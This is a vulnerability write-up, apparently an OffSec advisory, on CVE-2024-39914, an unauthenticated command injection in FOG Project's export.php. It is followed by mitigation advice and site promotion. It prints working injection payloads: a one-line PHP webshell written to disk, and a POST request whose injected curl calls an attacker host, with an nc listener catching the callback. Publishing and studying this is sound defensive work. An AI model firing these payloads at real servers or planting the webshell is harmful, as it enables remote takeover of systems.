Jun 26, 2025
CVE-2024-39914 – Unauthenticated Command Injection in FOG Project’s export.php
Discover details about CVE-2024-39914, a critical unauthenticated command injection vulnerability in FOG Project ≤ 1.5.10.34. Learn how attackers can exploit export.php to execute system commands or deploy persistent webshells.
OffSec Team
CVE-2024-39914 is a critical unauthenticated command injection vulnerability in FOG Project version ≤ 1.5.10.34. The flaw exists in how the filename parameter is processed by export.php, allowing attackers to inject arbitrary system commands. This can be used for immediate command execution or to drop a persistent PHP webshell for follow-up exploitation.
- CVE ID: CVE-2024-39914
- Severity: Critical
- CVSS Score: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
- EPSS Score: 92.67%
- Affected Versions: ≤ 1.5.10.34
- Patched Version: 1.5.10.35
- Authentication Required: No
Impact: Remote Command Execution
Technical Breakdown
The export.php script within the fog/management/ directory includes logic that passes the filename parameter to a backend system command, likely using shell_exec() or similar unsanitized execution.
An attacker can inject system commands inside the filename parameter, for example:
filename=$(id)This leads to immediate execution of id on the server. Additionally, attackers can write arbitrary content (e.g., a webshell) into a file on the server:
filename=$(echo '<?php echo shell_exec($_GET["cmd"]); ?>' > WEBSHELL)The resulting file (WEBSHELL) can then be accessed remotely to execute further OS commands.
Conditions for Exploitation
- FOG server must be network accessible
- No login or session is required
- Web server user must have write access to the web directory
- PHP execution is enabled under /fog/management/
Exploitation Steps
To exploit this, inject a system command in the filename parameter to achieve unauthenticated RCE.
Step 1: Send Malicious POST Request
POST /fog/management/export.php?filename=$(curl+192.168.100.8)&type=pdf HTTP/1.1
Host: 192.168.15.5
Content-Length: 21
User-Agent: ToxicPotato
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
fogguiuser=fog&nojson=2Step 2: Monitor the Attacker Server
On the attacking machine (e.g., 192.167.100.1), listen for incoming requests:
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 80
Connection from 192.168.15.5:49802
GET / HTTP/1.1Mitigation
- Upgrade to FOG Project 1.5.10.35 or later, where input validation and shell execution logic has been corrected
- Restrict access to /fog/management/ from public networks
- Apply input validation and disallow shell execution from user-supplied parameters
- Use a WAF to detect command injection patterns ($(), ;, |, etc.)
- Disable PHP execution in upload/export directories if possible
References
Stay in the know: Become an OffSec Insider
Get the latest updates about resources, events & promotions from OffSec!
Latest from OffSec
Research & Tutorials
CVE-2024-39914 – Unauthenticated Command Injection in FOG Project’s export.php
Discover details about CVE-2024-39914, a critical unauthenticated command injection vulnerability in FOG Project ≤ 1.5.10.34. Learn how attackers can exploit export.php to execute system commands or deploy persistent webshells.
Jun 26, 2025
2 min read
OffSec News
What It Really Means to “Try Harder”
Discover how OffSec’s “Try Harder” mantra evolved into a mindset, and how it helps learners build grit, creativity, and real-world problem-solving skills.
Jun 23, 2025
7 min read
Research & Tutorials
CVE-2025-3248 – Unauthenticated Remote Code Execution in Langflow via Insecure Python exec Usage
CVE-2025-3248 is a critical RCE vulnerability in Langflow that allows unauthenticated attackers to execute arbitrary Python code via unsanitized input to exec(). Learn how it works and how to protect your system.
Jun 18, 2025
2 min read